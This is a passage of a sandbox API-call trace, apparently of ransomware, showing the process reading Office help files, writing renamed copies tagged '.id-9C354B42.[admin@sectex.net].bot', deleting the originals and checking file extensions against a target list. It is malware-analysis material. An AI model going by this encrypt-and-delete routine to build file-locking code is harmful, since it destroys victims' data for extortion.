	[0149.477] lstrlenW (lpString="OUTLOOK.DEV_COL.HXT") returned 19
	[0149.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.477] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=211) returned 1
	[0149.477] CloseHandle (hObject=0x3dc) returned 1
	[0149.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxt")) returned 0x20
	[0149.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.478] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.478] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.478] GetLastError () returned 0x0
	[0149.479] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xd3, lpOverlapped=0x0) returned 1
	[0149.479] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0149.480] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.480] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0149.480] SetEndOfFile (hFile=0x384) returned 1
	[0149.480] CloseHandle (hObject=0x384) returned 1
	[0149.481] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.481] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.483] CloseHandle (hObject=0x3dc) returned 1
	[0149.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxt")) returned 1
	[0149.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.484] lstrlenW (lpString=".doc") returned 4
	[0149.484] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.484] lstrlenW (lpString=".docx") returned 5
	[0149.484] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.484] lstrlenW (lpString=".pdf") returned 4
	[0149.484] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.484] lstrlenW (lpString=".xls") returned 4
	[0149.484] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.484] lstrlenW (lpString=".xlsx") returned 5
	[0149.484] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.484] lstrlenW (lpString=".ppt") returned 4
	[0149.484] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.484] lstrlenW (lpString=".zip") returned 4
	[0149.484] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.484] lstrlenW (lpString=".rar") returned 4
	[0149.484] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.484] lstrlenW (lpString=".bz2") returned 4
	[0149.484] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.484] lstrlenW (lpString=".7z") returned 3
	[0149.484] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.485] lstrlenW (lpString=".dbf") returned 4
	[0149.485] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.485] lstrlenW (lpString=".1cd") returned 4
	[0149.485] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.485] lstrlenW (lpString=".jpg") returned 4
	[0149.485] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.485] lstrlenW (lpString=".doc") returned 4
	[0149.485] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.485] lstrlenW (lpString=".docx") returned 5
	[0149.485] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0149.485] lstrlenW (lpString=".pdf") returned 4
	[0149.485] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0149.485] lstrlenW (lpString=".xls") returned 4
	[0149.485] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0149.485] lstrlenW (lpString=".xlsx") returned 5
	[0149.485] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0149.485] lstrlenW (lpString=".ppt") returned 4
	[0149.485] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0149.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.485] lstrlenW (lpString=".zip") returned 4
	[0149.485] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0149.485] lstrlenW (lpString=".rar") returned 4
	[0149.485] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0149.485] lstrlenW (lpString=".bz2") returned 4
	[0149.485] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0149.486] lstrlenW (lpString=".7z") returned 3
	[0149.486] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0149.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.486] lstrlenW (lpString=".dbf") returned 4
	[0149.486] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0149.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.486] lstrlenW (lpString=".1cd") returned 4
	[0149.486] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0149.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXT") returned 67
	[0149.486] lstrlenW (lpString=".jpg") returned 4
	[0149.486] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0149.486] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.486] lstrlenW (lpString="OUTLOOK.DEV_F_COL.HXK") returned 21
	[0149.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.487] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=114) returned 1
	[0149.487] CloseHandle (hObject=0x3dc) returned 1
	[0149.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_f_col.hxk")) returned 0x20
	[0149.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.487] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.487] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.488] GetLastError () returned 0x0
	[0149.488] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x72, lpOverlapped=0x0) returned 1
	[0149.489] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.490] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.490] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0149.490] SetEndOfFile (hFile=0x384) returned 1
	[0149.490] CloseHandle (hObject=0x384) returned 1
	[0149.490] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.490] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.492] CloseHandle (hObject=0x3dc) returned 1
	[0149.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.493] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_f_col.hxk")) returned 1
	[0149.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.493] lstrlenW (lpString=".doc") returned 4
	[0149.493] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.493] lstrlenW (lpString=".docx") returned 5
	[0149.493] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.493] lstrlenW (lpString=".pdf") returned 4
	[0149.493] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.493] lstrlenW (lpString=".xls") returned 4
	[0149.493] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.493] lstrlenW (lpString=".xlsx") returned 5
	[0149.493] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.493] lstrlenW (lpString=".ppt") returned 4
	[0149.494] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.494] lstrlenW (lpString=".zip") returned 4
	[0149.494] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.494] lstrlenW (lpString=".rar") returned 4
	[0149.494] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.494] lstrlenW (lpString=".bz2") returned 4
	[0149.494] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.494] lstrlenW (lpString=".7z") returned 3
	[0149.494] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.494] lstrlenW (lpString=".dbf") returned 4
	[0149.494] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.494] lstrlenW (lpString=".1cd") returned 4
	[0149.494] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.494] lstrlenW (lpString=".jpg") returned 4
	[0149.494] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.494] lstrlenW (lpString=".doc") returned 4
	[0149.494] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.494] lstrlenW (lpString=".docx") returned 5
	[0149.494] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.494] lstrlenW (lpString=".pdf") returned 4
	[0149.494] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.494] lstrlenW (lpString=".xls") returned 4
	[0149.494] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.494] lstrlenW (lpString=".xlsx") returned 5
	[0149.494] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.495] lstrlenW (lpString=".ppt") returned 4
	[0149.495] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.495] lstrlenW (lpString=".zip") returned 4
	[0149.495] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.495] lstrlenW (lpString=".rar") returned 4
	[0149.495] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.495] lstrlenW (lpString=".bz2") returned 4
	[0149.495] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.495] lstrlenW (lpString=".7z") returned 3
	[0149.495] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.495] lstrlenW (lpString=".dbf") returned 4
	[0149.495] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.495] lstrlenW (lpString=".1cd") returned 4
	[0149.495] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_F_COL.HXK") returned 69
	[0149.495] lstrlenW (lpString=".jpg") returned 4
	[0149.495] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.495] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.495] lstrlenW (lpString="OUTLOOK.DEV_K_COL.HXK") returned 21
	[0149.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.496] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0149.496] CloseHandle (hObject=0x3dc) returned 1
	[0149.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_k_col.hxk")) returned 0x20
	[0149.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0149.496] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.496] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.497] GetLastError () returned 0x0
	[0149.497] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0149.498] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.499] ReadFile (in: hFile=0x3dc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.499] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0149.499] SetEndOfFile (hFile=0x384) returned 1
	[0149.499] CloseHandle (hObject=0x384) returned 1
	[0149.499] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.499] SetEndOfFile (hFile=0x3dc) returned 1
	[0149.501] CloseHandle (hObject=0x3dc) returned 1
	[0149.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.502] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_k_col.hxk")) returned 1
	[0149.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.502] lstrlenW (lpString=".doc") returned 4
	[0149.503] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.503] lstrlenW (lpString=".docx") returned 5
	[0149.503] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.503] lstrlenW (lpString=".pdf") returned 4
	[0149.503] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.503] lstrlenW (lpString=".xls") returned 4
	[0149.503] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.503] lstrlenW (lpString=".xlsx") returned 5
	[0149.503] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.503] lstrlenW (lpString=".ppt") returned 4
	[0149.503] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.503] lstrlenW (lpString=".zip") returned 4
	[0149.503] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.503] lstrlenW (lpString=".rar") returned 4
	[0149.503] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.503] lstrlenW (lpString=".bz2") returned 4
	[0149.503] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.503] lstrlenW (lpString=".7z") returned 3
	[0149.503] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.503] lstrlenW (lpString=".dbf") returned 4
	[0149.503] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.503] lstrlenW (lpString=".1cd") returned 4
	[0149.503] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.503] lstrlenW (lpString=".jpg") returned 4
	[0149.503] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.504] lstrlenW (lpString=".doc") returned 4
	[0149.504] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.504] lstrlenW (lpString=".docx") returned 5
	[0149.504] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.504] lstrlenW (lpString=".pdf") returned 4
	[0149.504] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.504] lstrlenW (lpString=".xls") returned 4
	[0149.504] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.504] lstrlenW (lpString=".xlsx") returned 5
	[0149.504] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.504] lstrlenW (lpString=".ppt") returned 4
	[0149.504] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.504] lstrlenW (lpString=".zip") returned 4
	[0149.504] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.504] lstrlenW (lpString=".rar") returned 4
	[0149.504] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.504] lstrlenW (lpString=".bz2") returned 4
	[0149.504] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.504] lstrlenW (lpString=".7z") returned 3
	[0149.504] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.504] lstrlenW (lpString=".dbf") returned 4
	[0149.504] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_K_COL.HXK") returned 69
	[0149.504] lstrlenW (lpString=".1cd") returned 4
	[0149.504] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
